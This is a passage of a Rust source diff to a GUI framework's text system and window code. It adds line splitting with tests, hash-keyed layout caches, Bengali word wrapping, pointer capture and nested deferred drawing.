advance width computed by the text shaping system and is useful for + /// incrementally advancing a "pen" when painting multiple fragments on the same row. + pub fn width(&self) -> Pixels { + self.layout.width + } + /// Override the len, useful if you're rendering text a /// as text b (e.g. rendering invisibles). pub fn with_len(mut self, len: usize) -> Self { @@ -108,6 +128,120 @@ impl ShapedLine { Ok(()) } + + /// Split this shaped line at a byte index, returning `(prefix, suffix)`. + /// + /// - `prefix` contains glyphs for bytes `[0, byte_index)` with original positions. + /// Its width equals the x-advance up to the split point. + /// - `suffix` contains glyphs for bytes `[byte_index, len)` with positions + /// shifted left so the first glyph starts at x=0, and byte indices rebased to 0. + /// - Decoration runs are partitioned at the boundary; a run that straddles it is + /// split into two with adjusted lengths. + /// - `font_size`, `ascent`, and `descent` are copied to both halves. + pub fn split_at(&self, byte_index: usize) -> (ShapedLine, ShapedLine) { + let x_offset = self.layout.x_for_index(byte_index); + + // Partition glyph runs. A single run may contribute glyphs to both halves. + let mut left_runs = Vec::new(); + let mut right_runs = Vec::new(); + + for run in &self.layout.runs { + let split_pos = run.glyphs.partition_point(|g| g.index < byte_index); + + if split_pos > 0 { + left_runs.push(ShapedRun { + font_id: run.font_id, + glyphs: run.glyphs[..split_pos].to_vec(), + }); + } + + if split_pos < run.glyphs.len() { + let right_glyphs = run.glyphs[split_pos..] + .iter() + .map(|g| ShapedGlyph { + id: g.id, + position: point(g.position.x - x_offset, g.position.y), + index: g.index - byte_index, + is_emoji: g.is_emoji, + }) + .collect(); + right_runs.push(ShapedRun { + font_id: run.font_id, + glyphs: right_glyphs, + }); + } + } + + // Partition decoration runs. A run straddling the boundary is split into two. + let mut left_decorations = SmallVec::new(); + let mut right_decorations = SmallVec::new(); + let mut decoration_offset = 0u32; + let split_point = byte_index as u32; + + for decoration in &self.decoration_runs { + let run_end = decoration_offset + decoration.len; + + if run_end <= split_point { + left_decorations.push(decoration.clone()); + } else if decoration_offset >= split_point { + right_decorations.push(decoration.clone()); + } else { + let left_len = split_point - decoration_offset; + let right_len = run_end - split_point; + left_decorations.push(DecorationRun { + len: left_len, + color: decoration.color, + background_color: decoration.background_color, + underline: decoration.underline, + strikethrough: decoration.strikethrough, + }); + right_decorations.push(DecorationRun { + len: right_len, + color: decoration.color, + background_color: decoration.background_color, + underline: decoration.underline, + strikethrough: decoration.strikethrough, + }); + } + + decoration_offset = run_end; + } + + // Split text + let left_text = SharedString::new(self.text[..byte_index].to_string()); + let right_text = SharedString::new(self.text[byte_index..].to_string()); + + let left_width = x_offset; + let right_width = self.layout.width - left_width; + + let left = ShapedLine { + layout: Arc::new(LineLayout { + font_size: self.layout.font_size, + width: left_width, + ascent: self.layout.ascent, + descent: self.layout.descent, + runs: left_runs, + len: byte_index, + }), + text: left_text, + decoration_runs: left_decorations, + }; + + let right = ShapedLine { + layout: Arc::new(LineLayout { + font_size: self.layout.font_size, + width: right_width, + ascent: self.layout.ascent, + descent: self.layout.descent, + runs: right_runs, + len: self.layout.len - byte_index, + }), + text: right_text, + decoration_runs: right_decorations, + }; + + (left, right) + } } /// A line of text that has been shaped, decorated, and wrapped by the text layout system. @@ -594,3 +728,268 @@ fn aligned_origin_x( TextAlign::Right => origin.x + align_width - line_width, } } + +#[cfg(test)] +mod tests { + use super::*; + use crate::{FontId, GlyphId}; + + /// Helper: build a ShapedLine from glyph descriptors without the platform text system. + /// Each glyph is described as (byte_index, x_position). + fn make_shaped_line( + text: &str, + glyphs: &[(usize, f32)], + width: f32, + decorations: &[DecorationRun], + ) -> ShapedLine { + let shaped_glyphs: Vec = glyphs + .iter() + .map(|&(index, x)| ShapedGlyph { + id: GlyphId(0), + position: point(px(x), px(0.0)), + index, + is_emoji: false, + }) + .collect(); + + ShapedLine { + layout: Arc::new(LineLayout { + font_size: px(16.0), + width: px(width), + ascent: px(12.0), + descent: px(4.0), + runs: vec![ShapedRun { + font_id: FontId(0), + glyphs: shaped_glyphs, + }], + len: text.len(), + }), + text: SharedString::new(text.to_string()), + decoration_runs: SmallVec::from(decorations.to_vec()), + } + } + + #[test] + fn test_split_at_invariants() { + // Split "abcdef" at every possible byte index and verify structural invariants. + let line = make_shaped_line( + "abcdef", + &[ + (0, 0.0), + (1, 10.0), + (2, 20.0), + (3, 30.0), + (4, 40.0), + (5, 50.0), + ], + 60.0, + &[], + ); + + for i in 0..=6 { + let (left, right) = line.split_at(i); + + assert_eq!( + left.width() + right.width(), + line.width(), + "widths must sum at split={i}" + ); + assert_eq!( + left.len() + right.len(), + line.len(), + "lengths must sum at split={i}" + ); + assert_eq!( + format!("{}{}", left.text.as_ref(), right.text.as_ref()), + "abcdef", + "text must concatenate at split={i}" + ); + assert_eq!(left.font_size, line.font_size, "font_size at split={i}"); + assert_eq!(right.ascent, line.ascent, "ascent at split={i}"); + assert_eq!(right.descent, line.descent, "descent at split={i}"); + } + + // Edge: split at 0 produces no left runs, full content on right + let (left, right) = line.split_at(0); + assert_eq!(left.runs.len(), 0); + assert_eq!(right.runs[0].glyphs.len(), 6); + + // Edge: split at end produces full content on left, no right runs + let (left, right) = line.split_at(6); + assert_eq!(left.runs[0].glyphs.len(), 6); + assert_eq!(right.runs.len(), 0); + } + + #[test] + fn test_split_at_glyph_rebasing() { + // Two font runs (simulating a font fallback boundary at byte 3): + // run A (FontId 0): glyphs at bytes 0,1,2 positions 0,10,20 + // run B (FontId 1): glyphs at bytes 3,4,5 positions 30,40,50 + // Successive splits simulate the incremental splitting done during wrap. + let line = ShapedLine { + layout: Arc::new(LineLayout { + font_size: px(16.0), + width: px(60.0), + ascent: px(12.0), + descent: px(4.0), + runs: vec![ + ShapedRun { + font_id: FontId(0), + glyphs: vec![ + ShapedGlyph { + id: GlyphId(0), + position: point(px(0.0), px(0.0)), + index: 0, + is_emoji: false, + }, + ShapedGlyph { + id: GlyphId(0), + position: point(px(10.0), px(0.0)), + index: 1, + is_emoji: false, + }, + ShapedGlyph { + id: GlyphId(0), + position: point(px(20.0), px(0.0)), + index: 2, + is_emoji: false, + }, + ], + }, + ShapedRun { + font_id: FontId(1), + glyphs: vec![ + ShapedGlyph { + id: GlyphId(0), + position: point(px(30.0), px(0.0)), + index: 3, + is_emoji: false, + }, + ShapedGlyph { + id: GlyphId(0), + position: point(px(40.0), px(0.0)), + index: 4, + is_emoji: false, + }, + ShapedGlyph { + id: GlyphId(0), + position: point(px(50.0), px(0.0)), + index: 5, + is_emoji: false, + }, + ], + }, + ], + len: 6, + }), + text: SharedString::new("abcdef".to_string()), + decoration_runs: SmallVec::new(), + }; + + // First split at byte 2 — mid-run in run A + let (first, remainder) = line.split_at(2); + assert_eq!(first.text.as_ref(), "ab"); + assert_eq!(first.runs.len(), 1); + assert_eq!(first.runs[0].font_id, FontId(0)); + + // Remainder "cdef" should have two runs: tail of A (1 glyph) + all of B (3 glyphs) + assert_eq!(remainder.text.as_ref(), "cdef"); + assert_eq!(remainder.runs.len(), 2); + assert_eq!(remainder.runs[0].font_id, FontId(0)); + assert_eq!(remainder.runs[0].glyphs.len(), 1); + assert_eq!(remainder.runs[0].glyphs[0].index, 0); + assert_eq!(remainder.runs[0].glyphs[0].position.x, px(0.0)); + assert_eq!(remainder.runs[1].font_id, FontId(1)); + assert_eq!(remainder.runs[1].glyphs[0].index, 1); + assert_eq!(remainder.runs[1].glyphs[0].position.x, px(10.0)); + + // Second split at byte 2 within remainder — crosses the run boundary + let (second, final_part) = remainder.split_at(2); + assert_eq!(second.text.as_ref(), "cd"); + assert_eq!(final_part.text.as_ref(), "ef"); + assert_eq!(final_part.runs[0].glyphs[0].index, 0); + assert_eq!(final_part.runs[0].glyphs[0].position.x, px(0.0)); + + // Widths must sum across all three pieces + assert_eq!( + first.width() + second.width() + final_part.width(), + line.width() + ); + } + + #[test] + fn test_split_at_decorations() { + // Three decoration runs: red [0..2), green [2..5), blue [5..6). + // Split at byte 3 — red goes entirely left, green straddles, blue goes entirely right. + let red = Hsla { + h: 0.0, + s: 1.0, + l: 0.5, + a: 1.0, + }; + let green = Hsla { + h: 0.3, + s: 1.0, + l: 0.5, + a: 1.0, + }; + let blue = Hsla { + h: 0.6, + s: 1.0, + l: 0.5, + a: 1.0, + }; + + let line = make_shaped_line( + "abcdef", + &[ + (0, 0.0), + (1, 10.0), + (2, 20.0), + (3, 30.0), + (4, 40.0), + (5, 50.0), + ], + 60.0, + &[ + DecorationRun { + len: 2, + color: red, + background_color: None, + underline: None, + strikethrough: None, + }, + DecorationRun { + len: 3, + color: green, + background_color: None, + underline: None, + strikethrough: None, + }, + DecorationRun { + len: 1, + color: blue, + background_color: None, + underline: None, + strikethrough: None, + }, + ], + ); + + let (left, right) = line.split_at(3); + + // Left: red(2) + green(1) — green straddled, left portion has len 1 + assert_eq!(left.decoration_runs.len(), 2); + assert_eq!(left.decoration_runs[0].len, 2); + assert_eq!(left.decoration_runs[0].color, red); + assert_eq!(left.decoration_runs[1].len, 1); + assert_eq!(left.decoration_runs[1].color, green); + + // Right: green(2) + blue(1) — green straddled, right portion has len 2 + assert_eq!(right.decoration_runs.len(), 2); + assert_eq!(right.decoration_runs[0].len, 2); + assert_eq!(right.decoration_runs[0].color, green); + assert_eq!(right.decoration_runs[1].len, 1); + assert_eq!(right.decoration_runs[1].color, blue); + } +} diff --git a/crates/gpui/src/text_system/line_layout.rs b/crates/gpui/src/text_system/line_layout.rs index 78ab21b3d324674b0f34d9ab418893430df70f2a..8f3d7563d068979defa8b3f93367a2c9b7102cc1 100644 --- a/crates/gpui/src/text_system/line_layout.rs +++ b/crates/gpui/src/text_system/line_layout.rs @@ -401,12 +401,25 @@ struct FrameCache { wrapped_lines: FxHashMap, Arc>, used_lines: Vec>, used_wrapped_lines: Vec>, + + // Content-addressable caches keyed by caller-provided text hash + layout params. + // These allow cache hits without materializing a contiguous `SharedString`. + // + // IMPORTANT: To support allocation-free lookups, we store these maps using a key type + // (`HashedCacheKeyRef`) that can be computed without building a contiguous `&str`/`SharedString`. + // On miss, we allocate once and store under an owned `HashedCacheKey`. + lines_by_hash: FxHashMap, Arc>, + wrapped_lines_by_hash: FxHashMap, Arc>, + used_lines_by_hash: Vec>, + used_wrapped_lines_by_hash: Vec>, } #[derive(Clone, Default)] pub(crate) struct LineLayoutIndex { lines_index: usize, wrapped_lines_index: usize, + lines_by_hash_index: usize, + wrapped_lines_by_hash_index: usize, } impl LineLayoutCache { @@ -423,6 +436,8 @@ impl LineLayoutCache { LineLayoutIndex { lines_index: frame.used_lines.len(), wrapped_lines_index: frame.used_wrapped_lines.len(), + lines_by_hash_index: frame.used_lines_by_hash.len(), + wrapped_lines_by_hash_index: frame.used_wrapped_lines_by_hash.len(), } } @@ -445,6 +460,24 @@ impl LineLayoutCache { } current_frame.used_wrapped_lines.push(key.clone()); } + + for key in &previous_frame.used_lines_by_hash + [range.start.lines_by_hash_index..range.end.lines_by_hash_index] + { + if let Some((key, line)) = previous_frame.lines_by_hash.remove_entry(key) { + current_frame.lines_by_hash.insert(key, line); + } + current_frame.used_lines_by_hash.push(key.clone()); + } + + for key in &previous_frame.used_wrapped_lines_by_hash + [range.start.wrapped_lines_by_hash_index..range.end.wrapped_lines_by_hash_index] + { + if let Some((key, line)) = previous_frame.wrapped_lines_by_hash.remove_entry(key) { + current_frame.wrapped_lines_by_hash.insert(key, line); + } + current_frame.used_wrapped_lines_by_hash.push(key.clone()); + } } pub fn truncate_layouts(&self, index: LineLayoutIndex) { @@ -453,6 +486,12 @@ impl LineLayoutCache { current_frame .used_wrapped_lines .truncate(index.wrapped_lines_index); + current_frame + .used_lines_by_hash + .truncate(index.lines_by_hash_index); + current_frame + .used_wrapped_lines_by_hash + .truncate(index.wrapped_lines_by_hash_index); } pub fn finish_frame(&self) { @@ -463,6 +502,11 @@ impl LineLayoutCache { curr_frame.wrapped_lines.clear(); curr_frame.used_lines.clear(); curr_frame.used_wrapped_lines.clear(); + + curr_frame.lines_by_hash.clear(); + curr_frame.wrapped_lines_by_hash.clear(); + curr_frame.used_lines_by_hash.clear(); + curr_frame.used_wrapped_lines_by_hash.clear(); } pub fn layout_wrapped_line( @@ -590,6 +634,165 @@ impl LineLayoutCache { layout } } + + /// Try to retrieve a previously-shaped line layout using a caller-provided content hash. + /// + /// This is a *non-allocating* cache probe: it does not materialize any text. If the layout + /// is not already cached in either the current frame or previous frame, returns `None`. + /// + /// Contract (caller enforced): + /// - Same `text_hash` implies identical text content (collision risk accepted by caller). + /// - `text_len` should be the UTF-8 byte length of the text (helps reduce accidental collisions). + pub fn try_layout_line_by_hash( + &self, + text_hash: u64, + text_len: usize, + font_size: Pixels, + runs: &[FontRun], + force_width: Option, + ) -> Option> { + let key_ref = HashedCacheKeyRef { + text_hash, + text_len, + font_size, + runs, + wrap_width: None, + force_width, + }; + + let current_frame = self.current_frame.read(); + if let Some((_, layout)) = current_frame.lines_by_hash.iter().find(|(key, _)| { + HashedCacheKeyRef { + text_hash: key.text_hash, + text_len: key.text_len, + font_size: key.font_size, + runs: key.runs.as_slice(), + wrap_width: key.wrap_width, + force_width: key.force_width, + } == key_ref + }) { + return Some(layout.clone()); + } + + let previous_frame = self.previous_frame.lock(); + if let Some((_, layout)) = previous_frame.lines_by_hash.iter().find(|(key, _)| { + HashedCacheKeyRef { + text_hash: key.text_hash, + text_len: key.text_len, + font_size: key.font_size, + runs: key.runs.as_slice(), + wrap_width: key.wrap_width, + force_width: key.force_width, + } == key_ref + }) { + return Some(layout.clone()); + } + + None + } + + /// Layout a line of text using a caller-provided content hash as the cache key. + /// + /// This enables cache hits without materializing a contiguous `SharedString` for `text`. + /// If the cache misses, `materialize_text` is invoked to produce the `SharedString` for shaping. + /// + /// Contract (caller enforced): + /// - Same `text_hash` implies identical text content (collision risk accepted by caller). + /// - `text_len` should be the UTF-8 byte length of the text (helps reduce accidental collisions). + pub fn layout_line_by_hash( + &self, + text_hash: u64, + text_len: usize, + font_size: Pixels, + runs: &[FontRun], + force_width: Option, + materialize_text: impl FnOnce() -> SharedString, + ) -> Arc { + let key_ref = HashedCacheKeyRef { + text_hash, + text_len, + font_size, + runs, + wrap_width: None, + force_width, + }; + + // Fast path: already cached (no allocation). + let current_frame = self.current_frame.upgradable_read(); + if let Some((_, layout)) = current_frame.lines_by_hash.iter().find(|(key, _)| { + HashedCacheKeyRef { + text_hash: key.text_hash, + text_len: key.text_len, + font_size: key.font_size, + runs: key.runs.as_slice(), + wrap_width: key.wrap_width, + force_width: key.force_width, + } == key_ref + }) { + return layout.clone(); + } + + let mut current_frame = RwLockUpgradableReadGuard::upgrade(current_frame); + + // Try to reuse from previous frame without allocating; do a linear scan to find a matching key. + // (We avoid `drain()` here because it would eagerly move all entries.) + let mut previous_frame = self.previous_frame.lock(); + if let Some(existing_key) = previous_frame + .used_lines_by_hash + .iter() + .find(|key| { + HashedCacheKeyRef { + text_hash: key.text_hash, + text_len: key.text_len, + font_size: key.font_size, + runs: key.runs.as_slice(), + wrap_width: key.wrap_width, + force_width: key.force_width, + } == key_ref + }) + .cloned() + { + if let Some((key, layout)) = previous_frame.lines_by_hash.remove_entry(&existing_key) { + current_frame + .lines_by_hash + .insert(key.clone(), layout.clone()); + current_frame.used_lines_by_hash.push(key); + return layout; + } + } + + let text = materialize_text(); + let mut layout = self + .platform_text_system + .layout_line(&text, font_size, runs); + + if let Some(force_width) = force_width { + let mut glyph_pos = 0; + for run in layout.runs.iter_mut() { + for glyph in run.glyphs.iter_mut() { + if (glyph.position.x - glyph_pos * force_width).abs() > px(1.) { + glyph.position.x = glyph_pos * force_width; + } + glyph_pos += 1; + } + } + } + + let key = Arc::new(HashedCacheKey { + text_hash, + text_len, + font_size, + runs: SmallVec::from(runs), + wrap_width: None, + force_width, + }); + let layout = Arc::new(layout); + current_frame + .lines_by_hash + .insert(key.clone(), layout.clone()); + current_frame.used_lines_by_hash.push(key); + layout + } } /// A run of text with a single font. @@ -622,12 +825,80 @@ struct CacheKeyRef<'a> { force_width: Option, } +#[derive(Clone, Debug)] +struct HashedCacheKey { + text_hash: u64, + text_len: usize, + font_size: Pixels, + runs: SmallVec<[FontRun; 1]>, + wrap_width: Option, + force_width: Option, +} + +#[derive(Copy, Clone)] +struct HashedCacheKeyRef<'a> { + text_hash: u64, + text_len: usize, + font_size: Pixels, + runs: &'a [FontRun], + wrap_width: Option, + force_width: Option, +} + impl PartialEq for dyn AsCacheKeyRef + '_ { fn eq(&self, other: &dyn AsCacheKeyRef) -> bool { self.as_cache_key_ref() == other.as_cache_key_ref() } } +impl PartialEq for HashedCacheKey { + fn eq(&self, other: &Self) -> bool { + self.text_hash == other.text_hash + && self.text_len == other.text_len + && self.font_size == other.font_size + && self.runs.as_slice() == other.runs.as_slice() + && self.wrap_width == other.wrap_width + && self.force_width == other.force_width + } +} + +impl Eq for HashedCacheKey {} + +impl Hash for HashedCacheKey { + fn hash(&self, state: &mut H) { + self.text_hash.hash(state); + self.text_len.hash(state); + self.font_size.hash(state); + self.runs.as_slice().hash(state); + self.wrap_width.hash(state); + self.force_width.hash(state); + } +} + +impl PartialEq for HashedCacheKeyRef<'_> { + fn eq(&self, other: &Self) -> bool { + self.text_hash == other.text_hash + && self.text_len == other.text_len + && self.font_size == other.font_size + && self.runs == other.runs + && self.wrap_width == other.wrap_width + && self.force_width == other.force_width + } +} + +impl Eq for HashedCacheKeyRef<'_> {} + +impl Hash for HashedCacheKeyRef<'_> { + fn hash(&self, state: &mut H) { + self.text_hash.hash(state); + self.text_len.hash(state); + self.font_size.hash(state); + self.runs.hash(state); + self.wrap_width.hash(state); + self.force_width.hash(state); + } +} + impl Eq for dyn AsCacheKeyRef + '_ {} impl Hash for dyn AsCacheKeyRef + '_ { diff --git a/crates/gpui/src/text_system/line_wrapper.rs b/crates/gpui/src/text_system/line_wrapper.rs index 07df35472b0bd3f91b8096439ed82cf811b45c77..ffc433c671ba8f13aff1655b0aed91f95d0ff22a 100644 --- a/crates/gpui/src/text_system/line_wrapper.rs +++ b/crates/gpui/src/text_system/line_wrapper.rs @@ -236,10 +236,13 @@ impl LineWrapper { matches!(c, '\u{1E00}'..='\u{1EFF}') || // Latin Extended Additional matches!(c, '\u{0300}'..='\u{036F}') || // Combining Diacritical Marks + // Bengali (https://en.wikipedia.org/wiki/Bengali_(Unicode_block)) + matches!(c, '\u{0980}'..='\u{09FF}') || + // Some other known special characters that should be treated as word characters, - // e.g. `a-b`, `var_name`, `I'm`, '@mention`, `#hashtag`, `100%`, `3.1415`, + // e.g. `a-b`, `var_name`, `I'm`/`won’t`, '@mention`, `#hashtag`, `100%`, `3.1415`, // `2^3`, `a~b`, `a=1`, `Self::new`, etc. - matches!(c, '-' | '_' | '.' | '\'' | '$' | '%' | '@' | '#' | '^' | '~' | ',' | '=' | ':') || + matches!(c, '-' | '_' | '.' | '\'' | '’' | '‘' | '$' | '%' | '@' | '#' | '^' | '~' | ',' | '=' | ':') || // `⋯` character is special used in Zed, to keep this at the end of the line. matches!(c, '⋯') } @@ -835,6 +838,8 @@ mod tests { assert_word("a=1"); assert_word("Self::is_word_char"); assert_word("more⋯"); + assert_word("won’t"); + assert_word("‘twas"); // Space assert_not_word("foo bar"); @@ -856,6 +861,10 @@ mod tests { assert_word("АБВГДЕЖЗИЙКЛМНОП"); // Vietnamese (https://github.com/zed-industries/zed/issues/23245) assert_word("ThậmchíđếnkhithuachạychúngcònnhẫntâmgiếtnốtsốđôngtùchínhtrịởYênBáivàCaoBằng"); + // Bengali + assert_word("গিয়েছিলেন"); + assert_word("ছেলে"); + assert_word("হচ্ছিল"); // non-word characters assert_not_word("你好"); diff --git a/crates/gpui/src/window.rs b/crates/gpui/src/window.rs index df5948cb99e75a1f15d5b9a63cb1c3a5a29fac03..f9885f634d962b167bcf32cc459d5bf6e0d5661e 100644 --- a/crates/gpui/src/window.rs +++ b/crates/gpui/src/window.rs @@ -560,12 +560,20 @@ pub enum WindowControlArea { pub struct HitboxId(u64); impl HitboxId { - /// Checks if the hitbox with this ID is currently hovered. Except when handling + /// Checks if the hitbox with this ID is currently hovered. Returns `false` during keyboard + /// input modality so that keyboard navigation suppresses hover highlights. Except when handling /// `ScrollWheelEvent`, this is typically what you want when determining whether to handle mouse /// events or paint hover styles. /// /// See [`Hitbox::is_hovered`] for details. pub fn is_hovered(self, window: &Window) -> bool { + // If this hitbox has captured the pointer, it's always considered hovered + if window.captured_hitbox == Some(self) { + return true; + } + if window.last_input_was_keyboard() { + return false; + } let hit_test = &window.mouse_hit_test; for id in hit_test.ids.iter().take(hit_test.hover_hitbox_count) { if self == *id { @@ -604,13 +612,15 @@ pub struct Hitbox { } impl Hitbox { - /// Checks if the hitbox is currently hovered. Except when handling `ScrollWheelEvent`, this is - /// typically what you want when determining whether to handle mouse events or paint hover - /// styles. + /// Checks if the hitbox is currently hovered. Returns `false` during keyboard input modality + /// so that keyboard navigation suppresses hover highlights. Except when handling + /// `ScrollWheelEvent`, this is typically what you want when determining whether to handle mouse + /// events or paint hover styles. /// /// This can return `false` even when the hitbox contains the mouse, if a hitbox in front of /// this sets `HitboxBehavior::BlockMouse` (`InteractiveElement::occlude`) or - /// `HitboxBehavior::BlockMouseExceptScroll` (`InteractiveElement::block_mouse_except_scroll`). + /// `HitboxBehavior::BlockMouseExceptScroll` (`InteractiveElement::block_mouse_except_scroll`), + /// or if the current input modality is keyboard (see [`Window::last_input_was_keyboard`]). /// /// Handling of `ScrollWheelEvent` should typically use `should_handle_scroll` instead. /// Concretely, this is due to use-cases like overlays that cause the elements under to be @@ -726,6 +736,7 @@ pub(crate) struct DeferredDraw { parent_node: DispatchNodeId, element_id_stack: SmallVec<[ElementId; 32]>, text_style_stack: Vec, + content_mask: Option>, rem_size: Pixels, element: Option, absolute_offset: Point, @@ -821,6 +832,11 @@ impl Frame { self.tab_stops.clear(); self.focus = None; + #[cfg(any(test, feature = "test-support"))] + { + self.debug_bounds.clear(); + } + #[cfg(any(feature = "inspector", debug_assertions))] { self.next_inspector_instance_ids.clear(); @@ -935,6 +951,7 @@ pub struct Window { pub(crate) bounds_observers: SubscriberSet<(), AnyObserver>, appearance: WindowAppearance, pub(crate) appearance_observers: SubscriberSet<(), AnyObserver>, + pub(crate) button_layout_observers: SubscriberSet<(), AnyObserver>, active: Rc>, hovered: Rc>, pub(crate) needs_present: Rc>, @@ -951,6 +968,9 @@ pub struct Window { pub(crate) pending_input_observers: SubscriberSet<(), AnyObserver>, prompt: Option, pub(crate) client_inset: Option, + /// The hitbox that has captured the pointer, if any. + /// While captured, mouse events route to this hitbox regardless of hit testing. + captured_hitbox: Option, #[cfg(any(feature = "inspector", debug_assertions))] inspector: Option>, } @@ -1269,6 +1289,14 @@ impl Window { .log_err(); } })); + platform_window.on_button_layout_changed(Box::new({ + let mut cx = cx.to_async(); + move || { + handle + .update(&mut cx, |_, window, cx| window.button_layout_changed(cx)) + .log_err(); + } + })); platform_window.on_active_status_change(Box::new({ let mut cx = cx.to_async(); move |active| { @@ -1423,6 +1451,7 @@ impl Window { bounds_observers: SubscriberSet::new(), appearance, appearance_observers: SubscriberSet::new(), + button_layout_observers: SubscriberSet::new(), active, hovered, needs_present, @@ -1438,6 +1467,7 @@ impl Window { prompt: None, client_inset: None, image_cache_stack: Vec::new(), + captured_hitbox: None, #[cfg(any(feature = "inspector", debug_assertions))] inspector: None, }) @@ -1514,6 +1544,22 @@ impl Window { subscription } + /// Registers a callback to be invoked when the window button layout changes. + pub fn observe_button_layout_changed( + &self, + mut callback: impl FnMut(&mut Window, &mut App) + 'static, + ) -> Subscription { + let (subscription, activate) = self.button_layout_observers.insert( + (), + Box::new(move |window, cx| { + callback(window, cx); + true + }), + ); + activate(); + subscription + } + /// Replaces the root entity of the window with a new one. pub fn replace_root( &mut self, @@ -1887,7 +1933,12 @@ impl Window { }) } - fn bounds_changed(&mut self, cx: &mut App) { + /// Notify the window that its bounds have changed. + /// + /// This updates internal state like `viewport_size` and `scale_factor` from + /// the platform window, then notifies observers. Normally called automatically + /// by the platform's resize callback, but exposed publicly for test infrastructure. + pub fn bounds_changed(&mut self, cx: &mut App) { self.scale_factor = self.platform_window.scale_factor(); self.viewport_size = self.platform_window.content_size(); self.display_id = self.platform_window.display().map(|display| display.id()); @@ -1931,6 +1982,12 @@ impl Window { .retain(&(), |callback| callback(self, cx)); } + pub(crate) fn button_layout_changed(&mut self, cx: &mut App) { + self.button_layout_observers + .clone() + .retain(&(), |callback| callback(self, cx)); + } + /// Returns the appearance of the current window. pub fn appearance(&self) -> WindowAppearance { self.appearance @@ -2143,6 +2200,26 @@ impl Window { self.mouse_position } + /// Captures the pointer for the given hitbox. While captured, all mouse move and mouse up + /// events will be routed to listeners that check this hitbox's `is_hovered` status, + /// regardless of actual hit testing. This enables drag operations that continue + /// even when the pointer moves outside the element's bounds. + /// + /// The capture is automatically released on mouse up. + pub fn capture_pointer(&mut self, hitbox_id: HitboxId) { + self.captured_hitbox = Some(hitbox_id); + } + + /// Releases any active pointer capture. + pub fn release_pointer(&mut self) { + self.captured_hitbox = None; + } + + /// Returns the hitbox that has captured the pointer, if any. + pub fn captured_hitbox(&self) -> Option { + self.captured_hitbox + } + /// The current state of the keyboard's modifiers pub fn modifiers(&self) -> Modifiers { self.modifiers @@ -2299,10 +2376,7 @@ impl Window { #[cfg(any(feature = "inspector", debug_assertions))] let inspector_element = self.prepaint_inspector(_inspector_width, cx); - let mut sorted_deferred_draws = - (0..self.next_frame.deferred_draws.len()).collect::>(); - sorted_deferred_draws.sort_by_key(|ix| self.next_frame.deferred_draws[*ix].priority); - self.prepaint_deferred_draws(&sorted_deferred_draws, cx); + self.prepaint_deferred_draws(cx); let mut prompt_element = None; let mut active_drag_element = None; @@ -2331,7 +2405,7 @@ impl Window { #[cfg(any(feature = "inspector", debug_assertions))] self.paint_inspector(inspector_element, cx); - self.paint_deferred_draws(&sorted_deferred_draws, cx); + self.paint_deferred_draws(cx); if let Some(mut prompt_element) = prompt_element { prompt_element.paint(self, cx); @@ -2414,54 +2488,80 @@ impl Window { None } - fn prepaint_deferred_draws(&mut self, deferred_draw_indices: &[usize], cx: &mut App) { + fn prepaint_deferred_draws(&mut self, cx: &mut App) { assert_eq!(self.element_id_stack.len(), 0); - let mut deferred_draws = mem::take(&mut self.next_frame.deferred_draws); - for deferred_draw_ix in deferred_draw_indices { - let deferred_draw = &mut deferred_draws[*deferred_draw_ix]; - self.element_id_stack - .clone_from(&deferred_draw.element_id_stack); - self.text_style_stack - .clone_from(&deferred_draw.text_style_stack); - self.next_frame - .dispatch_tree - .set_active_node(deferred_draw.parent_node); + let mut completed_draws = Vec::new(); + + // Process deferred draws in multiple rounds to support nesting. + // Each round processes all current deferred draws, which may produce new ones. + let mut depth = 0; + loop { + // Limit maximum nesting depth to prevent infinite loops. + assert!(depth < 10, "Exceeded maximum (10) deferred depth"); + depth += 1; + let deferred_count = self.next_frame.deferred_draws.len(); + if deferred_count == 0 { + break; + } - let prepaint_start = self.prepaint_index(); - if let Some(element) = deferred_draw.element.as_mut() { - self.with_rendered_view(deferred_draw.current_view, |window| { - window.with_rem_size(Some(deferred_draw.rem_size), |window| { - window.with_absolute_element_offset( - deferred_draw.absolute_offset, - |window| { - element.prepaint(window, cx); - }, - ); - }); - }) - } else { - self.reuse_prepaint(deferred_draw.prepaint_range.clone()); + // Sort by priority for this round + let traversal_order = self.deferred_draw_traversal_order(); + let mut deferred_draws = mem::take(&mut self.next_frame.deferred_draws); + + for deferred_draw_ix in traversal_order { + let deferred_draw = &mut deferred_draws[deferred_draw_ix]; + self.element_id_stack + .clone_from(&deferred_draw.element_id_stack); + self.text_style_stack + .clone_from(&deferred_draw.text_style_stack); + self.next_frame + .dispatch_tree + .set_active_node(deferred_draw.parent_node); + + let prepaint_start = self.prepaint_index(); + if let Some(element) = deferred_draw.element.as_mut() { + self.with_rendered_view(deferred_draw.current_view, |window| { + window.with_rem_size(Some(deferred_draw.rem_size), |window| { + window.with_absolute_element_offset( + deferred_draw.absolute_offset, + |window| { + element.prepaint(window, cx); + }, + ); + }); + }) + } else { + self.reuse_prepaint(deferred_draw.prepaint_range.clone()); + } + let prepaint_end = self.prepaint_index(); + deferred_draw.prepaint_range = prepaint_start..prepaint_end; } - let prepaint_end = self.prepaint_index(); - deferred_draw.prepaint_range = prepaint_start..prepaint_end; + + // Save completed draws and continue with newly added ones + completed_draws.append(&mut deferred_draws); + + self.element_id_stack.clear(); + self.text_style_stack.clear(); } - assert_eq!( - self.next_frame.deferred_draws.len(), - 0, - "cannot call defer_draw during deferred drawing" - ); - self.next_frame.deferred_draws = deferred_draws; - self.element_id_stack.clear(); - self.text_style_stack.clear(); + + // Restore all completed draws + self.next_frame.deferred_draws = completed_draws; } - fn paint_deferred_draws(&mut self, deferred_draw_indices: &[usize], cx: &mut App) { + fn paint_deferred_draws(&mut self, cx: &mut App) { assert_eq!(self.element_id_stack.len(), 0); + // Paint all deferred draws in priority order. + // Since prepaint has already processed nested deferreds, we just paint them all. + if self.next_frame.deferred_draws.len() == 0 { + return; + } + + let traversal_order = self.deferred_draw_traversal_order(); let mut deferred_draws = mem::take(&mut self.next_frame.deferred_draws); - for deferred_draw_ix in deferred_draw_indices { - let mut deferred_draw = &mut deferred_draws[*deferred_draw_ix]; + for deferred_draw_ix in traversal_order { + let mut deferred_draw = &mut deferred_draws[deferred_draw_ix]; self.element_id_stack .clone_from(&deferred_draw.element_id_stack); self.next_frame @@ -2469,10 +2569,13 @@ impl Window { .set_active_node(deferred_draw.parent_node); let paint_start = self.paint_index(); + let content_mask = deferred_draw.content_mask.clone(); if let Some(element) = deferred_draw.element.as_mut() { self.with_rendered_view(deferred_draw.current_view, |window| { - window.with_rem_size(Some(deferred_draw.rem_size), |window| { - element.paint(window, cx); + 